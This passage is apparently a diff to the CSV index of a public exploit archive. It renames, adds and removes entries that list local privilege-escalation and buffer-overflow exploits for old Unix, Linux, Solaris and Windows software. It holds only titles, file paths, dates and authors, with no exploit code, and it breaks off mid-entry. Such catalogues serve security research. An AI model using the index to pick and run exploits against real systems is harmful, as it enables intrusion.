@@ -7406,9 +7408,9 @@ id,file,description,date,author,type,platform,port 19196,exploits/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking Save Password",1998-03-19,"Martin Dolphin",local,windows, 19198,exploits/windows/local/19198.txt,"Microsoft Windows NT 4.0 SP4 - Known DLL Cache",1999-02-18,L0pht,local,windows, 19199,exploits/solaris/local/19199.c,"Solaris 2.5.1 - 'automount' Local Privilege Escalation",1997-11-26,anonymous,local,solaris, -19200,exploits/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (1)",1997-08-25,bloodmask,local,unix, -19201,exploits/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (2)",1997-08-25,jGgM,local,unix, -19202,exploits/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (3)",1997-08-25,jGgM,local,unix, +19200,exploits/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation (1)",1997-08-25,bloodmask,local,unix, +19201,exploits/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation (2)",1997-08-25,jGgM,local,unix, +19202,exploits/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation 
(3)",1997-08-25,jGgM,local,unix, 19203,exploits/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Local Privilege Escalation",1996-12-04,"Roger Espel Llima",local,unix, 19205,exploits/solaris/local/19205.c,"Sun Solaris 7.0 - '/usr/dt/bin/dtprintinfo' Local Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,local,solaris, 19206,exploits/solaris/local/19206.c,"Sun Solaris 7.0 - '/usr/bin/lpset' Local Buffer Overflow",1999-05-11,"kim yong-jun",local,solaris, @@ -7432,7 +7434,7 @@ id,file,description,date,author,type,platform,port 19244,exploits/osx/local/19244.sh,"Apple Mac OSX Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",local,osx, 19249,exploits/linux/local/19249.c,"Xcmail 0.99.6 - Local Buffer Overflow",1999-03-02,Arthur,local,linux, 19401,exploits/windows/local/19401.txt,"Apple QuickTime - QuickTime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",local,windows, -19254,exploits/linux/local/19254.c,"S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Privilege Escalation",1999-03-04,xnec,local,linux, +19254,exploits/linux/local/19254.c,"S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Local Privilege Escalation",1999-03-04,xnec,local,linux, 19255,exploits/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 - No Logging",1999-06-09,"Tani Hosokawa",local,linux, 19256,exploits/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian 2.0 - netstd",1999-01-03,anonymous,local,linux, 19257,exploits/linux/local/19257.c,"X11R6 3.3.3 - Symlink",1999-03-21,Stealthf0rk,local,linux, 
@@ -7497,7 +7499,6 @@ id,file,description,date,author,type,platform,port 19359,exploits/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",local,windows, 19360,exploits/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Local Buffer Overflow",1997-12-21,"Solar Designer",local,linux, 19362,exploits/sco/local/19362.c,"SCO Open Server 5.0.5 - XBase Buffer Overflow",1999-06-14,doble,local,sco, -19364,exploits/netware/local/19364.txt,"Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption",1999-04-09,dreamer,local,netware, 19384,exploits/linux/local/19384.c,"Debian 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",local,linux, 19370,exploits/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x/5.0 - Local Buffer Overflow",1999-06-25,KSR[T],local,linux, 19371,exploits/linux/local/19371.c,"VMware 1.0.1 - Local Buffer Overflow",1999-06-25,funkysh,local,linux, 
@@ -7564,7 +7565,7 @@ id,file,description,date,author,type,platform,port 19551,exploits/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",local,multiple, 19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple, 19556,exploits/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",local,multiple, -19565,exploits/linux/local/19565.sh,"SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Privilege Escalation",1999-10-22,"Brock Tellier",local,linux, +19565,exploits/linux/local/19565.sh,"SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Local Privilege Escalation",1999-10-22,"Brock Tellier",local,linux, 19673,exploits/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 - Help File Backdoor",1999-12-10,"Pauli Ojanpera",local,windows, 19674,exploits/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program Debugging",1999-12-10,"Brock Tellier",local,sco, 19676,exploits/linux/local/19676.c,"xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (1)",2000-05-17,"Brock Tellier",local,linux, 
@@ -7580,7 +7581,7 @@ id,file,description,date,author,type,platform,port 19641,exploits/sco/local/19641.c,"SCO Unixware 7.0/7.0.1/7.1 - Xsco Buffer Overflow",1999-11-25,K2,local,sco, 19642,exploits/sco/local/19642.c,"SCO Unixware 7.0 - 'xlock(1)' 'Username' Local Buffer Overflow",1999-11-25,AK,local,sco, 19643,exploits/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer Overflow",1999-10-30,K2,local,sco, -19647,exploits/solaris/local/19647.c,"Solaris 7.0 - 'kcms_configure' Local Overflow / Privilege Escalation",1999-11-30,UNYUN,local,solaris, +19647,exploits/solaris/local/19647.c,"Solaris 7.0 - 'kcms_configure' Local Overflow / Local Privilege Escalation",1999-11-30,UNYUN,local,solaris, 19648,exploits/solaris/local/19648.c,"Solaris 7.0 - CDE dtmail/mailtool Buffer Overflow",1999-11-30,UNYUN,local,solaris, 19649,exploits/freebsd/local/19649.c,"FreeBSD 3.3 - 'gdc' Local Buffer Overflow",1999-12-01,"Brock Tellier",local,freebsd, 19650,exploits/freebsd/local/19650.txt,"FreeBSD 3.3 - 'gdc' Symlink",1999-12-01,"Brock Tellier",local,freebsd, 
@@ -7964,7 +7965,7 @@ id,file,description,date,author,type,platform,port 21288,exploits/multiple/local/21288.txt,"Sawmill 6.2.x - Admin Password Insecure Default Permissions",2002-02-11,darky0da,local,multiple, 21290,exploits/unix/local/21290.sh,"Tarantella Enterprise 3 - Symbolic Link",2002-02-19,"Larry W. Cashdollar",local,unix, 21302,exploits/linux/local/21302.c,"Century Software Term For Linux 6.27.869 - Command Line Buffer Overflow",2002-02-25,"Haiku Hacker",local,linux, -21318,exploits/windows/local/21318.pl,"Internet Download Manager - Stack Based Buffer Overflow",2012-09-14,Dark-Puzzle,local,windows, +21318,exploits/windows/local/21318.pl,"Internet Download Manager - Local Stack Buffer Overflow",2012-09-14,Dark-Puzzle,local,windows, 21320,exploits/windows/local/21320.pl,"Internet Download Manager - Local Buffer Overflow (SEH)",2012-09-14,Dark-Puzzle,local,windows, 21323,exploits/linux/local/21323.c,"libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation",2012-07-17,"Sebastian Krahmer",local,linux, 21331,exploits/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - 'MRUList201202.dat' File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",local,windows, 
@@ -8047,7 +8048,7 @@ id,file,description,date,author,type,platform,port 21761,exploits/linux/local/21761.c,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (1)",2002-08-28,RaiSe,local,linux, 21762,exploits/linux/local/21762.c,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (2)",2002-08-28,"David Endler",local,linux, 21763,exploits/linux/local/21763.txt,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (3)",2002-08-28,syscalls,local,linux, -21771,exploits/unix/local/21771.c,"AFD 1.2.x - Working Directory Local Buffer Overflow / Privilege Escalation",2002-09-04,eSDee,local,unix, +21771,exploits/unix/local/21771.c,"AFD 1.2.x - Working Directory Local Buffer Overflow / Local Privilege Escalation",2002-09-04,eSDee,local,unix, 21772,exploits/unix/local/21772.pl,"HP Tru64 - NLSPATH Environment Variable Local Buffer Overflow (1)",2002-07-03,stripey,local,unix, 21773,exploits/unix/local/21773.pl,"HP Tru64 - NLSPATH Environment Variable Local Buffer Overflow (2)",2002-08-30,digitalmunition,local,unix, 21774,exploits/unix/local/21774.pl,"HP Tru64 4.0/5.0/5.1 - _XKB_CHARSET Local Buffer Overflow",2002-07-10,stripey,local,unix, 
@@ -8196,7 +8197,7 @@ id,file,description,date,author,type,platform,port 22965,exploits/linux/local/22965.c,"XBlast 2.6.1 - 'HOME Environment' Local Buffer Overflow",2003-07-28,c0wboy,local,linux, 22923,exploits/unix/local/22923.c,"Tolis Group BRU 17.0 - Local Privilege Escalation (1)",2003-07-16,DVDMAN,local,unix, 22924,exploits/unix/local/22924.c,"Tolis Group BRU 17.0 - Local Privilege Escalation (2)",2003-07-16,nic,local,unix, -22928,exploits/linux/local/22928.pl,"mcrypt 2.5.8 - Stack Based Overflow",2012-11-26,Tosh,local,linux, +22928,exploits/linux/local/22928.pl,"mcrypt 2.5.8 - Local Stack Overflow",2012-11-26,Tosh,local,linux, 22931,exploits/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional - Direct RETN",2012-11-26,Nezim,local,windows, 22932,exploits/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - '.PLF' Direct Retn",2012-11-26,Nezim,local,windows, 23007,exploits/windows/local/23007.rb,"Microsoft Windows - AlwaysInstallElevated MSI (Metasploit)",2012-11-29,Metasploit,local,windows, 
@@ -8225,7 +8226,6 @@ id,file,description,date,author,type,platform,port 23126,exploits/linux/local/23126.c,"RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Privilege Escalation",2003-09-09,"Jon Hart",local,linux, 23141,exploits/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' 'REMOTE_ADDR' Authentication Bypass",2003-09-15,Texonet,local,sco, 23143,exploits/sco/local/23143.sh,"SCO OpenServer 5.0.x - 'mana' PATH_INFO Privilege Escalation",2003-09-15,Texonet,local,sco, -23154,exploits/linux/local/23154.c,"Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun",2003-09-17,"Gyan Chawdhary",local,linux, 23168,exploits/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Escalation",2003-09-22,"Sebastian Krahmer",local,linux, 23189,exploits/linux/local/23189.c,"marbles 1.0.1 - Local Home Environment Variable Buffer Overflow",2003-09-26,demz,local,linux, 23197,exploits/linux/local/23197.c,"Mah-Jong 1.4 - MJ-Player Server Flag Local Buffer Overflow",2003-09-29,jsk,local,linux, 
@@ -8303,7 +8303,7 @@ id,file,description,date,author,type,platform,port 24207,exploits/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Local Buffer Overflow",2013-01-18,"Jon Bailey",local,windows, 24210,exploits/hp-ux/local/24210.pl,"HP-UX 7-11 - X Font Server Local Buffer Overflow",2003-03-10,watercloud,local,hp-ux, 24258,exploits/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Local Privilege Escalation",2013-01-20,LiquidWorm,local,windows, -24277,exploits/windows/local/24277.c,"Microsoft Windows NT 4.0/2000 - POSIX Subsystem Buffer Overflow / Privilege Escalation (MS04-020)",2004-07-16,bkbll,local,windows, +24277,exploits/windows/local/24277.c,"Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020)",2004-07-16,bkbll,local,windows, 24278,exploits/linux/local/24278.sh,"IM-Switch - Insecure Temporary File Handling Symbolic Link",2004-07-13,"SEKINE Tatsuo",local,linux, 24293,exploits/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",local,sco, 24335,exploits/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual Escribá",local,unix, 
@@ -8345,13 +8345,12 @@ id,file,description,date,author,type,platform,port 25039,exploits/aix/local/25039.txt,"IBM AIX 5.x - 'Diag' Local Privilege Escalation",2004-12-20,cees-bart,local,aix, 25040,exploits/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module - Offset Memory Corruption",2004-12-20,"Stefano Di Paola",local,php, 25055,exploits/osx/local/25055.c,"Darwin Kernel 7.1 - Mach File Parsing Local Integer Overflow",2005-01-19,nemo@felinemenace.org,local,osx, -25080,exploits/linux/local/25080.txt,"Newsgrab 0.5.0pre4 - Multiple Local/Remote Vulnerabilities",2005-02-02,"Niels Heinen",local,linux, 25106,exploits/linux/local/25106.c,"Typespeed 0.4.1 - Local Format String",2005-02-16,"Ulf Harnhammar",local,linux, 25130,exploits/windows/local/25130.py,"FuzeZip 1.0.0.131625 - Local Buffer Overflow (SEH)",2013-05-01,RealPentesting,local,windows, 25131,exploits/windows/local/25131.py,"WinArchiver 3.2 - Local Buffer Overflow (SEH)",2013-05-01,RealPentesting,local,windows, 25134,exploits/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 - 'sudo_debug' glibc FORTIFY_SOURCE Bypass + Privilege Escalation",2013-05-01,aeon,local,linux, 25141,exploits/windows/local/25141.rb,"AudioCoder 0.8.18 - Local Buffer Overflow (SEH)",2013-05-02,metacom,local,windows, -25202,exploits/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Integer Overflow / Privilege Escalation (1)",2005-03-09,sd,local,linux, +25202,exploits/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation (1)",2005-03-09,sd,local,linux, 25204,exploits/windows/local/25204.py,"ABBS Audio Media Player 3.1 - '.lst' Local Buffer Overflow",2013-05-04,"Julien Ahrens",local,windows, 25256,exploits/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,local,osx, 25288,exploits/linux/local/25288.c,"Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1)",2005-04-08,qobaiashi,local,linux, 
@@ -8393,7 +8392,7 @@ id,file,description,date,author,type,platform,port 26218,exploits/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,local,linux, 26222,exploits/windows/local/26222.c,"Microsoft Windows XP/2000/2003 - Keyboard Event Privilege Escalation",2005-08-06,"Andres Tarasco",local,windows, 26242,exploits/windows/local/26242.py,"Adrenalin Player 2.2.5.3 - '.wax' Local Buffer Overflow (SEH)",2013-06-17,Onying,local,windows, -26245,exploits/windows/local/26245.py,"Winamp 5.12 - '.m3u' Stack Based Buffer Overflow",2013-06-17,superkojiman,local,windows, +26245,exploits/windows/local/26245.py,"Winamp 5.12 - '.m3u' Local Stack Buffer Overflow",2013-06-17,superkojiman,local,windows, 26321,exploits/linux/local/26321.c,"Gnome-PTY-Helper UTMP - Hostname Spoofing",2005-10-03,"Paul Szabo",local,linux, 26323,exploits/windows/local/26323.cpp,"Microsoft Windows XP - Wireless Zero Configuration Service Information Disclosure",2005-10-04,"Laszlo Toth",local,windows, 26352,exploits/php/local/26352.php,"PHP 5.0.5 - Safedir Restriction Bypass",2005-10-17,anonymous,local,php, 
@@ -8412,12 +8411,13 @@ id,file,description,date,author,type,platform,port 26454,exploits/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)",2013-06-26,Metasploit,local,freebsd, 26479,exploits/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass",2005-11-07,Tr0y-x,local,windows, 26492,exploits/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution",2002-12-31,"Georgi Guninski",local,linux, +26497,exploits/windows/local/26497.c,"RealNetworks RealOne Player/RealPlayer - '.RM' Local Stack Buffer Overflow",2005-11-10,nolimit,local,windows, 26498,exploits/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",local,linux, 26520,exploits/windows/local/26520.py,"Static HTTP Server 1.0 - Local Overflow (SEH)",2013-07-01,"Jacob Holcomb",local,windows, 26523,exploits/windows/local/26523.rb,"AudioCoder (.lst) - Local Buffer Overflow (Metasploit)",2013-07-01,Asesino04,local,windows, 26525,exploits/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx' Local Buffer Overflow (SEH)",2013-07-01,MrXors,local,windows, 26554,exploits/windows/local/26554.rb,"Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Local Privilege Escalation (Metasploit)",2013-07-02,Metasploit,local,windows, -28085,exploits/windows/local/28085.html,"KingView 6.53 - 'KChartXY' ActiveX Remote File Creation / Overwrite",2013-09-04,blake,local,windows, +28085,exploits/windows/local/28085.html,"KingView 6.53 - 'KChartXY' ActiveX File Creation / Overwrite",2013-09-04,blake,local,windows, 26579,exploits/windows/local/26579.rb,"ABBS Audio Media Player - '.LST' Local Buffer Overflow (Metasploit)",2013-07-03,Metasploit,local,windows, 26703,exploits/windows/local/26703.py,"Adobe Reader X 10.1.4.38 - '.BMP'/'.RLE' Heap Corruption",2013-07-08,feliam,local,windows, 26708,exploits/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow 
(Metasploit)",2013-07-09,Metasploit,local,windows, 
@@ -8425,13 +8425,13 @@ id,file,description,date,author,type,platform,port 26752,exploits/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,local,windows, 26753,exploits/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,local,unix, 26805,exploits/windows/local/26805.rb,"Corel PDF Fusion - Local Stack Buffer Overflow (Metasploit)",2013-07-13,Metasploit,local,windows, -26889,exploits/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Direct RET Buffer Overflow",2013-07-16,PuN1sh3r,local,windows, +26889,exploits/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow",2013-07-16,PuN1sh3r,local,windows, 40385,exploits/netbsd_x86/local/40385.rb,"NetBSD - 'mail.local(8)' Local Privilege Escalation (Metasploit)",2016-09-15,Metasploit,local,netbsd_x86, 26950,exploits/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Kernel Mode Privilege Escalation",2013-07-18,MJ0011,local,windows, 26970,exploits/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",local,windows, 26996,exploits/aix/local/26996.txt,"IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Enumeration",2005-12-30,xfocus,local,aix, 26997,exploits/aix/local/26997.txt,"IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Disclosure",2006-01-01,xfocus,local,aix, -27041,exploits/windows/local/27041.pl,"Super Player 3500 - '.m3u' Local Stack Based Buffer Overflow",2013-07-23,jun,local,windows, +27041,exploits/windows/local/27041.pl,"Super Player 3500 - '.m3u' Local Stack Buffer Overflow",2013-07-23,jun,local,windows, 27056,exploits/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass (1)",2006-01-09,"Breno Silva Pinto",local,linux, 27057,exploits/linux/local/27057.py,"Sudo 1.6.x - Environment Variable Handling Security Bypass (2)",2006-01-09,"Breno Silva 
Pinto",local,linux, 27065,exploits/linux/local/27065.txt,"Cray UNICOS /usr/bin/script - Command Line Argument Local Overflow",2006-01-10,"Micheal Turner",local,linux, @@ -8544,7 +8544,7 @@ id,file,description,date,author,type,platform,port 30336,exploits/windows/local/30336.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (2)",2013-12-16,"Morteza Hashemi",local,windows, 30802,exploits/windows/local/30802.c,"VMware Tools 3.1 - 'HGFS.Sys' Local Privilege Escalation",2007-11-24,SoBeIt,local,windows, 30374,exploits/windows/local/30374.txt,"QuickHeal AntiVirus 7.0.0.1 - Local Stack Overflow",2013-12-17,"Arash Allebrahim",local,windows, -30399,exploits/aix/local/30399.c,"IBM AIX 5.2/5.3 - Capture Command Local Stack Based Buffer Overflow",2007-07-26,qaaz,local,aix, +30399,exploits/aix/local/30399.c,"IBM AIX 5.2/5.3 - Capture Command Local Stack Buffer Overflow",2007-07-26,qaaz,local,aix, 40520,exploits/windows/local/40520.txt,"ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows, 40522,exploits/windows/local/40522.txt,"InsOnSrv Asus InstantOn 2.3.1.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows, 30464,exploits/linux/local/30464.c,"Generic Software Wrappers Toolkit 1.6.3 (GSWTK) - Race Condition Privilege Escalation",2007-08-09,"Robert N. M. Watson",local,linux, 
@@ -8567,8 +8567,8 @@ id,file,description,date,author,type,platform,port 30839,exploits/linux/local/30839.c,"Zabbix 1.1.4/1.4.2 - 'daemon_start' Local Privilege Escalation",2007-12-03,"Bas van Schaik",local,linux, 30999,exploits/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Local Privilege Escalation",2008-01-07,"Ruben Santamarta",local,windows, 31036,exploits/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",local,windows, -31090,exploits/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",local,windows, -31151,exploits/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow",2008-02-12,forensec,local,linux, +31090,exploits/windows/local/31090.txt,"MuPDF 1.3 - Stack Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",local,windows, +31151,exploits/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Buffer Overflow",2008-02-12,forensec,local,linux, 31182,exploits/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",local,windows, 31346,exploits/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)",2014-02-02,saelo,local,linux, 31347,exploits/lin_x86-64/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3)",2014-02-02,rebel,local,lin_x86-64, 
@@ -8603,18 +8603,18 @@ id,file,description,date,author,type,platform,port 32156,exploits/qnx/local/32156.txt,"QNX 6.4.x/6.5.x pppoectl - Information Disclosure",2014-03-10,cenobyte,local,qnx, 32158,exploits/windows/local/32158.txt,"iCAM Workstation Control 4.8.0.0 - Authentication Bypass",2014-03-10,StealthHydra,local,windows, 32205,exploits/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Local Privilege Escalation",2014-03-12,LiquidWorm,local,windows, -32261,exploits/windows/local/32261.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",local,windows, +32261,exploits/windows/local/32261.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow",2014-03-14,"Necmettin COSKUN",local,windows, 32343,exploits/php/local/32343.php,"PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' / 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,local,php, 32358,exploits/windows/local/32358.pl,"MP3Info 0.8.5a - Local Buffer Overflow (SEH)",2014-03-19,"Ayman Sagy",local,windows, 32370,exploits/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Local Privilege Escalation",2014-03-19,xistence,local,hardware, 32446,exploits/linux/local/32446.txt,"Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage",2008-09-30,"Pascal Bouchareine",local,linux, 32501,exploits/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. 
Garcia",local,multiple, -32572,exploits/windows/local/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Privilege Escalation",2008-11-07,alex,local,windows, +32572,exploits/windows/local/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Local Privilege Escalation",2008-11-07,alex,local,windows, 32585,exploits/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,local,windows, 32590,exploits/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow",2008-11-19,"Marius Wachtler",local,windows, 32693,exploits/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' / 'Safe_Mode()' Restriction Bypass",2008-12-31,Mr.SaFa7,local,php, 32700,exploits/linux/local/32700.rb,"ibstat $PATH - Local Privilege Escalation (Metasploit)",2014-04-04,Metasploit,local,linux, -32737,exploits/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",local,windows, +32737,exploits/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",local,windows, 32751,exploits/lin_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",local,lin_x86-64, 32752,exploits/windows/local/32752.rb,"WinRAR - Filename Spoofing (Metasploit)",2014-04-08,Metasploit,local,windows, 32771,exploits/windows/local/32771.txt,"Kaspersky (Multiple Products) - 'klim5.sys' Local Privilege Escalation",2009-02-02,"Ruben Santamarta",local,windows, 
@@ -8681,12 +8681,12 @@ id,file,description,date,author,type,platform,port 34167,exploits/win_x86/local/34167.rb,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit)",2014-07-25,Metasploit,local,win_x86, 34267,exploits/linux/local/34267.sh,"Altair Engineering PBS Pro 10.x - 'pbs_mom' Insecure Temporary File Creation",2010-07-07,"Bartlomiej Balcerek",local,linux, 40917,exploits/windows/local/40917.py,"Nidesoft MP3 Converter 2.6.18 - Local Buffer Overflow (SEH)",2016-12-15,malwrforensics,local,windows, -34272,exploits/windows/local/34272.py,"Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow / Privilege Escalation",2014-08-05,"ryujin & sickness",local,windows, +34272,exploits/windows/local/34272.py,"Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow / Local Privilege Escalation",2014-08-05,"ryujin & sickness",local,windows, 34311,exploits/solaris/local/34311.sh,"Oracle Solaris 8/9/10 - 'flar' Insecure Temporary File Creation",2010-07-12,"Frank Stuart",local,solaris, 34313,exploits/solaris/local/34313.txt,"Oracle Solaris - 'nfslogd' Insecure Temporary File Creation",2010-07-13,"Frank Stuart",local,solaris, 34314,exploits/solaris/local/34314.sh,"Oracle Solaris Management Console - WBEM Insecure Temporary File Creation",2010-07-13,"Frank Stuart",local,solaris, 34333,exploits/windows/local/34333.rb,"Oracle VM VirtualBox Guest Additions 4.3.10r93012 - 'VBoxGuest.sys' Local Privilege Escalation 